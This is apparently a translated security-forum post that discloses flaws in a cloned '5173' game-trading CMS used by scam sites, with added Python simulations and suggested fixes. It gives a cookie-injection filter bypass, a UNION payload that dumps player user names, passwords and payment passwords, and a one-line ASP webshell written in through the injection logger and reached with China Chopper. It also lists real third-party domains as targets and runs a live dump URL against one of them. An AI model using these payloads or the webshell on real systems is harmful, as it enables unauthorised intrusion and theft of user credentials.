Imitation 5173 game trading platform: SQL injection (database can be dumped directly) + getshell

Source: Internet
Author: User
Tags: servervariables, sql injection

Recently I logged back into a game I had not played for a few years and found someone shouting high-priced offers. Obviously a scammer, but one who still wants to scam me? So I went along to see how this clown works. He gave me a link to what he claimed was the 5173 trading platform and told me to fill in my details there; once they were filled in he would "buy". I took a careful look at the platform, got hold of its source code and, heh, there are plenty of holes. This imitation-5173 online game trading platform has both an injection and a getshell vulnerability, so the player data can be dragged off directly.
WooYun won't accept a report for a generic system like this, so I'm posting it in the zone for everyone to play with. The system actually has a lot more holes than shown here. I hate scammers, so let's go and knock over a few scam platforms; most deployments of it are phishing sites set up by scammers anyway.



A: SQL injection one
Vulnerable file: /help.asp

<!--#include file="conn.asp"-->
<!--#include file="inc/config.asp"-->

<%
If Trim(Request("id")) <> "" Then
    ' id is concatenated straight into the statement; Request("id") without a
    ' collection name also reads Request.Cookies, not only QueryString/Form
    Set rs = conn.Execute("select * from help where id =" & Trim(Request("id")) & " order by paixu asc")
    If Not rs.EOF Then
        title = rs("help_title")
        content = rs("help_content")
    End If
Else
    Set rs = conn.Execute("select top 1 * from help order by paixu asc")
    If Not rs.EOF Then
        title = rs("help_title")
        content = rs("help_content")
    End If
End If
%>


Here the id parameter goes into the query without any filtering, so there is SQL injection. However, conn.asp contains
<!--#include file="sqlin.asp"-->
and that anti-injection file is, as everyone knows, rubbish: it only scans the GET and POST collections (Request.QueryString and Request.Form). help.asp reads the value with Request("id"), which falls through QueryString, Form and then Cookies, so the same payload sent in a cookie named id reaches the query untouched. In other words, this converts directly into a cookie injection that bypasses the filter.



I won't go into this one further; let's look at the next injection point, which supports UNION queries.
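To make the bypass concrete, here is an added Python model of the two pieces that interact. It is not code from the page or from the CMS: sqlin.asp scanning only the Form and QueryString collections against its keyword list (the list is copied from the sqlin.asp source shown later on this page), and classic ASP's Request("id") falling through QueryString, Form and Cookies in that order. The request dictionaries are constructed sample input, and the hardened variant at the end is my own suggestion, not something the page proposes.

```python
import re

# Keyword list from sqlin.asp (fy_in on this page), already lower-case, split on "|".
FY_IN = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
BLACKLIST = [w for w in FY_IN.split("|") if w]


def sqlin_blocks(request):
    """Model of sqlin.asp: only the Form and QueryString collections are scanned.
    Returns (collection, parameter, keyword) for the first hit, or None."""
    for collection in ("form", "querystring"):
        for name, value in request.get(collection, {}).items():
            low = value.lower()
            for word in BLACKLIST:
                if word in low:
                    return (collection, name, word)
    return None


def asp_request(request, name):
    """Classic ASP Request(name) with no collection given: QueryString, then Form,
    then Cookies (ClientCertificate and ServerVariables are omitted in this model)."""
    for collection in ("querystring", "form", "cookies"):
        if name in request.get(collection, {}):
            return request[collection][name]
    return ""


def help_asp_query(request):
    """SQL that help.asp concatenates after conn.asp has pulled in sqlin.asp.
    Returns None when sqlin.asp would have ended the request."""
    if sqlin_blocks(request) is not None:
        return None
    id_value = asp_request(request, "id").strip()
    if id_value == "":
        return "select top 1 * from help order by paixu asc"
    return "select * from help where id =" + id_value + " order by paixu asc"


def valid_id(value):
    """Positive-integer check used by the hardened variant (my suggestion)."""
    return re.fullmatch(r"[0-9]{1,9}", value) is not None


def help_asp_query_fixed(request):
    """Hardened variant (my suggestion): read id only from the query string, accept
    digits only, and hand it over as a bound parameter instead of concatenating."""
    id_value = request.get("querystring", {}).get("id", "").strip()
    if id_value == "":
        return ("select top 1 * from help order by paixu asc", ())
    if not valid_id(id_value):
        raise ValueError("id must be a small positive integer")
    return ("select * from help where id = ? order by paixu asc", (int(id_value),))


PAYLOAD = "1 and 1=1"   # constructed probe; "and" is on the blacklist

if __name__ == "__main__":
    via_get = {"querystring": {"id": PAYLOAD}}     # blocked by sqlin.asp
    via_cookie = {"cookies": {"id": PAYLOAD}}      # never scanned, reaches the SQL
    print("GET   :", help_asp_query(via_get))
    print("Cookie:", help_asp_query(via_cookie))
```

The point the model makes is that the filter and the page disagree about where input comes from: the filter looks at two collections, the page reads from three. Any blacklist hung in front of Request(name) has that gap; the fix is to read from one named collection and validate or parameterize the value.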


B: SQL injection two
Vulnerable file: /card_server.asp

<%
function OpenDb(sDbName)
{
    /*
     *---------------OpenDb(sDbName)-----------------
     * Function: opens database sDbName and returns a Connection object.
     * Parameter: sDbName, string, database name.
     * Example: var conn = OpenDb("Database.mdb");
     *---------------OpenDb(sDbName)-----------------
     */
    /* var connstr = "Driver={sql server};server=.;Uid=sa;pwd=7881541;database=wangyou"; */
    var connstr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" + Server.MapPath(sDbName);
    var conn = Server.CreateObject("ADODB.Connection");
    conn.Open(connstr);
    return conn;
}
// opens its own connection: conn.asp, and with it sqlin.asp, is never included here
var oConn = OpenDb("hsgamedb/#HSgame201008041121.asp");
var sel = Request("sel");
var classid = Request("ClassID");
var fieldname = Request("fieldname");
var arrResult = new Array();
var sql = "Select " + fieldname + " from Game_class where parentid='" + sel + "' and classid=" + classid;
// the second assignment overwrites the first; sel is concatenated unquoted and unfiltered
var sql = "Select * from Card_class where parentid=" + sel + "";
Response.Write("Alert(" + sql + ")");
var rs0 = Server.CreateObject("ADODB.Recordset");
rs0.Open(sql, oConn, 1, 1);
while (!rs0.EOF)
{
    // put every matching row into the arrResult array as "column0|column1"
    arrResult[arrResult.length] = rs0(0).Value + "|" + rs0(1).Value;
    rs0.MoveNext();
}
// escape() works around the Chinese-character handling problem with XMLHTTP;
// the array is joined into a single string with "," as the separator
Response.Write(escape(arrResult.join(",")));
%>


This file does not include the shared database connection file; it creates its own connection object, so sqlin.asp is never loaded and offers no protection here whatsoever. The sel parameter is concatenated straight into the query without filtering, giving SQL injection. Two details worth noticing: the first sql assignment (with the quoted sel and the fieldname/classid parameters) is dead code, overwritten by the second, so the statement that actually runs is the unquoted numeric form, and the leftover Response.Write debug line echoes the assembled statement back to the client, which removes any guesswork about the query. The commented-out SQL Server connection string also still carries an sa password. A simple probe confirms the injection point:


http://127.0.0.1/card_server.asp?sel=1'

Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'parentid=1''.
/card_server.asp, line 28







The injection supports UNION queries, so the game_user table (player data) can be dumped; it seems sqlmap's table-name dictionary doesn't contain game_user? There is also a column alipay_pwd, which is the user's payment password. Because the page prints rs0(0) and rs0(1) of every row, the two columns you want go in the first two positions of the UNION and the remaining positions are padded with numbers to match the column count of Card_class:


http://127.0.0.1/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user
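The UNION dump can be rehearsed offline. The following Python is an added example, not code from the page or from the CMS: it rebuilds card_server.asp's query construction and its "column0|column1" output format over an in-memory SQLite database standing in for the Jet .mdb, with constructed card_class and game_user tables. card_class is assumed to have nine columns because the page's payload pads the UNION to nine values; the column names follow the page, the filler columns f4..f9 and all row data are made up. It also shows the usual order by N probe for finding that column count, and a parameterized version of the query as my own suggested fix.

```python
import sqlite3

CARD_CLASS_COLUMNS = 9   # assumed from the page's payload, which pads the UNION to nine values

# The page's payload, verbatim after URL decoding.
DUMP_PAYLOAD = "1 union select user_name,login_pwd,3,4,5,6,7,8,9 from game_user"


def make_db():
    """Constructed stand-in for the Jet file hsgamedb/#HSgame201008041121.asp.
    Column names are the page's; f4..f9 and every row are made up."""
    db = sqlite3.connect(":memory:")
    db.execute("create table card_class (classid integer, classname text, parentid integer,"
               " f4, f5, f6, f7, f8, f9)")
    db.executemany("insert into card_class values (?, ?, ?, 0, 0, 0, 0, 0, 0)",
                   [(1, "Card A", 1), (2, "Card B", 1), (3, "Card C", 2)])
    db.execute("create table game_user (user_name text, login_pwd text, alipay_pwd text)")
    db.executemany("insert into game_user values (?, ?, ?)",
                   [("admin", "s3cret", "pay-1111"), ("player1", "hunter2", "pay-2222")])
    return db


def card_server(db, sel):
    """card_server.asp as written: the second 'var sql' wins, sel is concatenated raw,
    and each row comes back as rs0(0)|rs0(1), comma-joined (escape() omitted here)."""
    sql = "Select * from Card_class where parentid=" + sel
    rows = db.execute(sql).fetchall()
    return ",".join("%s|%s" % (r[0], r[1]) for r in rows)


def count_columns(db, max_cols=20):
    """'order by N' probe: the first N that errors is one past the column count,
    which tells you how many values the UNION needs."""
    for n in range(1, max_cols + 1):
        try:
            card_server(db, "1 order by %d" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


def dump_users(db):
    """The page's dump: user_name and login_pwd land in the two columns the page prints."""
    return card_server(db, DUMP_PAYLOAD)


def card_server_fixed(db, sel):
    """Hardened version (my suggestion): numeric check plus a bound parameter.
    Returns None, running nothing, for a non-numeric sel."""
    if not sel.isdigit():
        return None
    rows = db.execute("Select classid, classname from Card_class where parentid=?",
                      (int(sel),)).fetchall()
    return ",".join("%s|%s" % (r[0], r[1]) for r in rows)


if __name__ == "__main__":
    db = make_db()
    print("columns:", count_columns(db))
    print("normal :", card_server(db, "1"))
    print("dump   :", dump_users(db))
    print("fixed  :", card_server_fixed(db, DUMP_PAYLOAD))
```

SQLite and Jet differ in dialect details, so treat this as a model of the mechanics rather than a Jet test bed: the order by probe and the nine-value UNION behave the same way on both, which is all the example relies on.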




Since the rule for generic systems is five cases, here are five:


http://hhgg88.com/card_server.asp?sel=1
http://www.loft98.com.cn/card_server.asp?sel=1
http://mosouu.com/card_server.asp?sel=1
http://gaoyi.cc/card_server.asp?sel=1
http://www.631hk.com/card_server.asp?sel=1



Let me dump one database to show you:

http://www.tylsf.com.cn/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user




C: getshell
Vulnerable file: /sqlin.asp


<%
'--------Database connection section--------------
'Dim dbkillsql,killsqlconn,connkillsql
dbkillsql = "sql_whelpu.asp"    ' the log database: a Jet file named .asp, inside the web root
'On Error Resume Next
Set killsqlconn = Server.CreateObject("ADODB.Connection")
connkillsql = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillsql)
killsqlconn.Open connkillsql
If Err Then
    Err.Clear
    Set killsqlconn = Nothing
    Response.Write "Database connection error, please check the connection string."
    Response.End
End If


'--------Definitions------------------
'Dim fy_post,fy_get,fy_in,fy_inf,fy_xh,fy_db,fy_dbstr,kill_ip,writesql
'Customize the strings to filter, separated by "|"
fy_in = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
kill_ip = True
writesql = True
'----------------------------------


fy_inf = Split(fy_in, "|")
'--------POST section------------------
If Request.Form <> "" Then
    For Each fy_post In Request.Form
        For fy_xh = 0 To UBound(fy_inf)
            If InStr(LCase(Request.Form(fy_post)), fy_inf(fy_xh)) <> 0 Then
                If writesql = True Then
                    ' the offending value is written to the log database by string
                    ' concatenation; only the single quote is doubled
                    killsqlconn.Execute("INSERT INTO Sqlin (SQLIN_IP,SQLIN_WEB,SQLIN_FS,SQLIN_CS,SQLIN_SJ) VALUES ('" & Request.ServerVariables("REMOTE_ADDR") & "','" & Request.ServerVariables("URL") & "','POST','" & fy_post & "','" & Replace(Request.Form(fy_post), "'", "''") & "')")
                    killsqlconn.Close
                    Set killsqlconn = Nothing
                End If
                Response.Write "<script language=javascript>alert('System tip: 108 illegal operation!');</script>"
                Response.Write "Illegal operation! The system has made the following record:<br>"
                Response.Write "Operation IP: " & Request.ServerVariables("REMOTE_ADDR") & "<br>"
                Response.Write "Operation time: " & Now & "<br>"
                Response.Write "Operation page: " & Request.ServerVariables("URL") & "<br>"
                Response.Write "Submission method: POST<br>"
                Response.Write "Submitted parameter: " & fy_post & "<br>"
                Response.Write "Submitted data: " & Request.Form(fy_post)
                Response.Redirect("Default.asp")
                Response.End
            End If
        Next
    Next
End If
'----------------------------------

'--------GET section-------------------
If Request.QueryString <> "" Then
    For Each fy_get In Request.QueryString
        For fy_xh = 0 To UBound(fy_inf)
            If InStr(LCase(Request.QueryString(fy_get)), fy_inf(fy_xh)) <> 0 Then
                If writesql = True Then
                    ' same concatenated INSERT for query-string hits
                    killsqlconn.Execute("INSERT INTO Sqlin (SQLIN_IP,SQLIN_WEB,SQLIN_FS,SQLIN_CS,SQLIN_SJ) VALUES ('" & Request.ServerVariables("REMOTE_ADDR") & "','" & Request.ServerVariables("URL") & "','GET','" & fy_get & "','" & Replace(Request.QueryString(fy_get), "'", "''") & "')")
                    killsqlconn.Close
                    Set killsqlconn = Nothing
                End If
                Response.Write "<script language=javascript>alert('System tip: 108 illegal operation!');</script>"
                Response.Write "Illegal operation! The system has made the following record:<br>"
                Response.Write "Operation IP: " & Request.ServerVariables("REMOTE_ADDR") & "<br>"
                Response.Write "Operation time: " & Now & "<br>"
                Response.Write "Operation page: " & Request.ServerVariables("URL") & "<br>"
                Response.Write "Submission method: GET<br>"
                Response.Write "Submitted parameter: " & fy_get & "<br>"
                Response.Write "Submitted data: " & Request.QueryString(fy_get)
                Response.Redirect("Default.asp")
                Response.End
            End If
        Next
    Next
End If
' note: nothing here scans Request.Cookies, which is what injection one exploits


%>



Here the string the user submitted is written straight into the sql_whelpu.asp database. Now imagine deliberately submitting a one-line ASP backdoor: the <% and %> tags are neither filtered nor encoded before the INSERT (only single quotes are doubled), the % inside <% is itself on the blacklist, so the payload is guaranteed to hit the logging branch, and the log database is a file with an .asp extension sitting under the web root, so it can be requested directly and IIS will parse the stored tag as script:

http://127.0.0.1/list_buy.asp?class_1=35536%20%3C%eval%20request(1)%%3E

Of course, if there are earlier submissions in the log you need to take care that the tags close properly, otherwise the page will not parse; once the one-liner has been written into the sql_whelpu.asp database, the webshell is yours. Shall we open it and have a look?
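What the logging branch actually stores can be checked offline. The following is an added Python model, not code from the page or the CMS, with a SQLite file standing in for the Jet .mdb. It URL-decodes the page's class_1 value the way Python's unquote does (invalid escapes such as %ev are left alone, so the value becomes 35536 <%eval request(1)%>), shows that the % inside <% is the blacklist entry that trips the filter, builds the same INSERT by string concatenation with the single-quote doubling the page's code does, and then reads the database file back as raw bytes to show the <% ... %> tag sits verbatim inside the file. Whether IIS then executes it depends on that file being served under an .asp extension, as on the page; the IP, URL and parameter name used here are constructed.

```python
import os
import sqlite3
import tempfile
from urllib.parse import unquote

# Keyword list from sqlin.asp on this page, split on "|".
FY_IN = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
BLACKLIST = [w for w in FY_IN.split("|") if w]

RAW_CLASS_1 = "35536%20%3C%eval%20request(1)%%3E"   # the page's class_1 value, verbatim


def first_keyword_hit(value):
    """The blacklist entry sqlin.asp matches first (its own loop order), or None."""
    low = value.lower()
    for word in BLACKLIST:
        if word in low:
            return word
    return None


def build_log_insert(ip, url, method, param, value):
    """The INSERT sqlin.asp concatenates; the only transformation is doubling ' ."""
    return ("INSERT INTO Sqlin (SQLIN_IP,SQLIN_WEB,SQLIN_FS,SQLIN_CS,SQLIN_SJ) VALUES ('"
            + ip + "','" + url + "','" + method + "','" + param + "','"
            + value.replace("'", "''") + "')")


def write_log_file(insert_sql, directory):
    """Run the INSERT against a fresh SQLite file carrying the page's log-DB name,
    then return the file's raw bytes (SQLite stands in for Jet here)."""
    path = os.path.join(directory, "sql_whelpu.asp")
    db = sqlite3.connect(path)
    db.execute("create table sqlin (sqlin_ip, sqlin_web, sqlin_fs, sqlin_cs, sqlin_sj)")
    db.execute(insert_sql)
    db.commit()
    db.close()
    with open(path, "rb") as fh:
        return fh.read()


def log_request(raw_query_value, ip="127.0.0.1", url="/list_buy.asp", param="class_1"):
    """Decode the GET value, apply the filter, and if it trips, write the log entry.
    Returns (decoded value, keyword that tripped or None, bytes of the log file)."""
    decoded = unquote(raw_query_value)
    keyword = first_keyword_hit(decoded)
    if keyword is None:
        return decoded, None, b""
    sql = build_log_insert(ip, url, "GET", param, decoded)
    with tempfile.TemporaryDirectory() as directory:
        data = write_log_file(sql, directory)
    return decoded, keyword, data


if __name__ == "__main__":
    decoded, keyword, data = log_request(RAW_CLASS_1)
    print("stored value :", decoded)
    print("tripped on   :", keyword)
    print("tag in file  :", b"<%eval request(1)%>" in data)
```

Two things follow from this for anyone fixing or auditing such a system: a blacklist logger is a write primitive into whatever it logs to, so the log store must not be a file the web server will execute (keep it outside the web root and never give it a script extension), and the INSERT itself should use bound parameters rather than quote doubling.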



China Chopper connection:
http://127.0.0.1/sql_whelpu.asp

